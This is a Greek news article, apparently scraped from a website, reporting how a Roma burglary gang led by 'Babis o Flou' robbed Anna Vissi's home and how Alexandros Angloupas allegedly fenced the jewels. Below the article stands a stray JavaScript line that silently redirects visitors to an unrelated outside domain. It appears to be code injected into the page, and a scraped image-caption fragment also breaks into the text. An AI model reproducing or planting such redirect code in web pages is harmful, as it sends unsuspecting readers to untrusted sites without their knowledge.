Ο Αγγλούπας, η διάρρηξη στο σπίτι της Άννας Βίσση και ο «Μπάμπης ο Φλου»

0
60

Ο αρχιμαφιόζος με το ψευδώνυμο «Μπάμπης ο Φλου» σχεδίασε και εκτέλεσε τη τη διάρρηξη στο σπίτι της Άννας Βίσση, όπως προκύπτει από τη δικογραφία για τη σπείρα των Ρομά που είχε ρημάξει τα βόρεια προάστια της Αθήνας και είχε επεκτείνει τη δράση της και στη βόρεια Ελλάδα.

Από το σπίτι της δημοφιλούς τραγουδίστριας έκλεψαν ένα χρηματοκιβώτιο με χρυσαφικά και κοσμήματα μεγάλης αξίας, καθώς και δύο κλειδιά θυρίδας τραπεζών.

Η αστυνομία γνώριζε ότι επρόκειτο να χτυπήσει η συμμορία, αλλά δεν μπόρεσε να προσδιορίσει ούτε την περιοχή ούτε τον στόχο. Είχε καταφέρει να υποκλέψει, περίπου 2 ώρες νωρίτερα, συνομιλία μεταξύ του «Μπάμπη του Φλου» κι ενός συνεργού του. Στη συνέχεια, απενεργοποίησαν τα κινητά τους και, έτσι, χάθηκε η δυνατότητα εντοπισμού τουςImage result for αγγλούπας άννα βίσση

Κάποια και από αυτά τα κλεμμένα φαίνεται πως κατέληξαν στα χέρια του Αλέξανδρου Αγγλούπα που -κατά τη δικογραφία- δρούσε ως κλεπταποδόχος. Αγόραζε από τη συμμορία και μεταπωλούσε σε κοσμηματοπωλεία του Κολωνακίου τα «προιόντα» και κρατούσε για τον εαυτό του μίζα 20 με 22%.

Ανώτατοι αξιωματικοί της ΕΛ.ΑΣ. υποστηρίζουν ότι τουλάχιστον 12 ιδιοκτήτες κοσμηματοπωλείων, ενεχυροδανειστηρίων και καταστημάτων αγοράς χρυσού εμπλέκονται στην υπόθεση, επειδή αποδέχονταν κλεμμένα κοσμήματα, πανάκριβα ρολογια και πολύτιμους λίθους

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here